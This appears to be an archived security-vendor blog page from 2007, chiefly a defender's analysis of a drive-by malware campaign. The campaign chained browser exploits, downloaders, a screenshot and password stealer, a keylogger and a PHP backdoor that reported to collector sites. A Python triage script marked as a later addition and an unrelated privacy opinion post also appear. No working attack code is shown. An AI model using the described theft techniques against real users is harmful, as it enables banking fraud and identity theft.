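Six “unique phishing URLs” here are two registrable domains, one of which is obviously being multiplied. Blocking at the domain level defeats the trick, at the cost of over-blocking on free-hosting services where one registrable domain serves many unrelated customers, which is why blocklist implementations tend to combine host-suffix and path-prefix matching rather than exact URLs, and why takedown at the domain or registrar is worth more than reporting URLs one at a time.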

The last APWG Phishing Trends Activity Report (April 2007) is available here : http://www.antiphishing.org/reports/apwg_report_april_2007.pdf

Another Identity Theft Story

(Updated on May 29. See note at end.)

Last Friday, we received various suspicious HTML files that contain malicious JavaScript routines. These contact a remote Web site and silently download an EXE file, which in turn downloads various unknown but suspicious programs. In France we decided to press the matter for several reasons: French or francophone people appeared especially targeted, and not only banking and e-commerce data were stolen but also more sensitive information about the private lives of our fellow citizens. So we contacted the French authorities.

We were able to fit together the pieces of the puzzle and understand the attack architecture.

The attacks started each time a victim reached an initiator site (1) hosting one of these scripts. One used an adodb.stream exploit; others exploited vulnerabilities referenced as MS06-006 and MS06-024.

While the victim browsed that page, an EXE file hosted on an intermediate site was silently dropped on the victim’s computer (2). If this downloader was not detected by up-to-date antivirus software, it turned off the Windows Security Center, modified some registry keys, and downloaded and installed another Trojan (3). When this work was done, the downloader self-destructed and passed control to the Trojan. Using the victim’s IP address as a parameter, the Trojan ran a JavaScript query to geolocate the infected machine (4). It used this site:

http://fresh-news.info/geoip/ip.php

Later the returned data were saved in the local registry as :
HKLM\System\CurrentControlSet\Control\InitRegKey\geoinfo

  • iso
  • country
  • region
  • city
  • latitude
  • longitude
  • ip

This information was sent to the collector site and appears at the top of the TXT files described below. Here’s a fake example:

PC Name = JOHN-3GR6524FRHN
PC IP = 82.22.97.32
PC Country/ISO/Region/City = france/fr/a3/paris
PC Location longitude/latitude = 2.3333/48.8667
Log Creation = 2007/05/21 13:22:05

Before this Trojan disappeared, it downloaded two new files (5). The first deactivated various antivirus products and modified the system’s hosts file to prevent security updates. Its main purpose, however, was to take a screenshot each time the victim clicked a mouse button inside a remote authentication window. Depending on which mouse button was clicked, one of the following image files was created:

date_time_snapshot-number_LMB_input-form-URL.jpg
date_time_snapshot-number_RMB_input-form-URL.jpg

The images files were sent to a collector site (6). That site’s address, login, and password, as well as links to download other malware were accessible via an admin site driven by the hackers (7).

The second file was a Browser Helper Object/password stealer. It especially monitored transactions with these financial sites:

  • e-gold.com,
  • meine.deutsche-bank.de,
  • banking.postbank.de

However, the BHO watched many other authentication forms and sent data to the collector site (6) using TXT files:

ISO-country-code_computername_IP_Date_time.txt

Other malware was downloaded according to instructions found on the collector site (8). This created a local web server (9) and installed a PHP backdoor on the compromised machine. A proxy (9) was also set up with various services:

  • SSL proxy
  • HTTP proxy
  • Socks server
  • Telnet gateway
  • SMTP server
  • FTP server
  • Remote administration server
  • Port mapping

After all this preparation these machines were able to act as zombies.

But that’s not all: a keylogger (10) was also downloaded. It collected the victim’s keystrokes and created this file:

keylog_ISO-country-code_computername_IP_date_time.txt

This Trojan also extracted all the URLs and the associated usernames and passwords saved by Internet Explorer’s AutoComplete facility (kept in the Protected Storage, hence the “pstore” name), and created this file:

pstore_date_time.txt
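Pulling together the naming conventions of the four artifact types above, here is an added example, not part of the original analysis, of the classifier one would run over a seized collector directory or a suspect machine’s temp folder to count artifacts, enumerate victims, and order the captures in time. The post gives only the field layout, so the underscore separators and YYYYMMDD/HHMMSS digit formats are assumptions; the sample listing is constructed (its host name and IP echo the fake example above).

```python
# Added example, not part of the original analysis: a classifier for the exfiltration
# file names described above, the kind of check you would run over a seized collector
# directory or a suspect host's temp folder. The post gives the field layout only, so the
# separators (underscores) and the YYYYMMDD / HHMMSS digit formats are assumptions, and
# the sample names below are constructed.
import re
from datetime import datetime

_IP = r"\d{1,3}(?:\.\d{1,3}){3}"
_DATE = r"(?P<date>\d{8})"
_TIME = r"(?P<time>\d{6})"

# Order matters: the keylog and pstore prefixes are checked before the generic form log,
# whose first field is just a two-letter ISO country code.
PATTERNS = [
    ("screenshot", re.compile(
        rf"^{_DATE}_{_TIME}_(?P<seq>\d+)_(?P<button>LMB|RMB)_(?P<url>.+)\.jpg$")),
    ("keylog", re.compile(
        rf"^keylog_(?P<iso>[a-z]{{2}})_(?P<host>[^_]+)_(?P<ip>{_IP})_{_DATE}_{_TIME}\.txt$")),
    ("pstore", re.compile(rf"^pstore_{_DATE}_{_TIME}\.txt$")),
    ("form_log", re.compile(
        rf"^(?P<iso>[a-z]{{2}})_(?P<host>[^_]+)_(?P<ip>{_IP})_{_DATE}_{_TIME}\.txt$")),
]


def classify(name: str):
    """Return (kind, fields) for a name matching one of the patterns, else None."""
    for kind, rx in PATTERNS:
        m = rx.match(name)
        if m:
            fields = m.groupdict()
            fields["timestamp"] = datetime.strptime(
                fields["date"] + fields["time"], "%Y%m%d%H%M%S")
            return kind, fields
    return None


def triage(names):
    """Summarise a directory listing: counts per artifact kind, victims seen
    (ISO code, host name, IP), and an ordered timeline of what was captured when."""
    counts = {"screenshot": 0, "keylog": 0, "pstore": 0, "form_log": 0, "unmatched": 0}
    victims = set()
    timeline = []
    for name in names:
        hit = classify(name)
        if hit is None:
            counts["unmatched"] += 1
            continue
        kind, f = hit
        counts[kind] += 1
        if "host" in f:  # screenshots and pstore dumps carry no victim identity
            victims.add((f["iso"], f["host"], f["ip"]))
        timeline.append((f["timestamp"], kind, name))
    timeline.sort()
    return {"counts": counts, "victims": sorted(victims), "timeline": timeline}


# Constructed listing; the host name and IP echo the post's own fake example.
SAMPLE_LISTING = [
    "20070521_132205_0001_LMB_login.bank.example.jpg",
    "20070521_132310_0002_RMB_login.bank.example.jpg",
    "fr_JOHN-3GR6524FRHN_82.22.97.32_20070521_132400.txt",
    "keylog_fr_JOHN-3GR6524FRHN_82.22.97.32_20070521_140001.txt",
    "pstore_20070521_140002.txt",
    "readme.txt",
]
```

On a real collector the value of this is the join: the form-log and keylog names identify the victim, and the timestamps line them up with the screenshots, so for each victim you can say which authentication windows were captured and when, which is exactly what the notification to affected banks and users needs.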

The Trojan regularly sent all the TXT files to the collector site (6), where they were automatically saved by country and by computer. Here’s a view taken before the site was closed:

Today we have all the pieces of this puzzle.

Origin                          Suspicious files                                        VirusScan name
(1) Initiator site (exploit)    1.html                                                  Generic Downloader.z
                                2.html                                                  Exploit-MS06-006.gen
                                3.html                                                  Generic Downloader.z
(2) Intermediate site           autoexec.exe (or iexplore.exe)                          BackDoor-CWW.dldr
(3) Malware site                ieschedule.exe                                          BackDoor-CWW
(5) Malware site                smss.exe                                                BackDoor-CWW
                                ib15.dll                                                PWS-Snap
(8) Malware site                ieserver.exe                                            BackDoor-CWW
(9) Malware site                php_sockets.dll                                         Innocent files
                                readme.txt
                                php.exe
                                php.ini
                                php4ts.dll
                                !hdd by http.html
                                download phpmyadmin from SourceForge into this dir.txt
                                phpinfo.php
                                back.gif
                                blank.gif
                                compressed.gif
                                dnserror.htm
                                dnserror_de.htm
                                file.gif
                                folder.gif
                                html.gif
                                pagerror.gif
                                php.gif
                                picture.gif
                                refresh.gif
                                upfolder.gif
                                mscreate.dir
                                htaccess.txt
                                test.htm
                                map.txt
                                remview.php                                             PHP/BackDoor-DLR
(10) Malware site               winlogon.exe                                            BackDoor-CWW
(11) Malware site               dsrss.exe                                               Keylog-Dta

As I said in introducing this blog, I found the geographical distribution unusual. France had the second highest number of victims, and the collected data were also very sensitive.

Country Victims (approx.)
USA 650
France 400
Turkey 150
Netherlands 140
Italy 130
Poland 100
Germany 60
Taiwan 50
Others 700

The stick-pin maps show the distribution.

 

We often hear of IT threats targeting the Anglo-American countries. This matter shows that no country is safe from cybercriminals.
——
Updated May 29:
I made two typos when I discussed the analysis of Elodie Grandjean. The first concerns one vulnerability used in this attack (it is MS06-024 and not MS06-026). The other regards the password stealer functionality. Both have been corrected in the text.

MS Overexposure Studio 2010?

I have read a couple of articles today; and I’m not sure whether to laugh or freak out. The claim is that major companies would be able to identify your name, address, gender, and make suggestions for possible life decisions. Is this for real? On the one hand I’m inclined to laugh because these are such ludicrous claims. It must surely be a hoax, and who in their right minds would trust strangers with that much information? On the other hand, I’m freaked out because once advertising money gets behind such a thing, it could very well become a reality. I also know there are agencies that already have much of this info about me, but it’s not as if they’re metaphorically or literally rifling through my trash to get it–I have to specifically give it to them and they have to spell out precisely what they’ll be doing with it.

Some of my colleagues say that I’m pretty paranoid about this sort of thing. And honestly, much of my argument boils down to “it gives me the wiggins, dood!” I haven’t gone so far as to store my life savings under my mattress, but there are certain Web 2.0 sites I just won’t participate in because there’s too much exposure, and I’m tired of getting spam and creepy messages from total strangers. In short, my time, sanity, and identity are worth more to me than the risks these sites represent.

I understand people enjoy the interconnectedness and power that these sites offer, and if you don’t mind the potential danger, spam, and creepiness, then more power to you. I won’t make prognostications of corporations using this for evil or what have you, because these areas are always a bit gray in reality. I will, however, remind people that accidents and cybercrimes do happen–no security is 100 percent bulletproof. This could be an incredibly valuable database that could be accessible to many more people than those databases where I give my information freely. The value of that data alone significantly ups the odds of criminals getting involved.

And really, the Internet offers more than enough opportunities for people to overexpose themselves without major companies taking it to another level.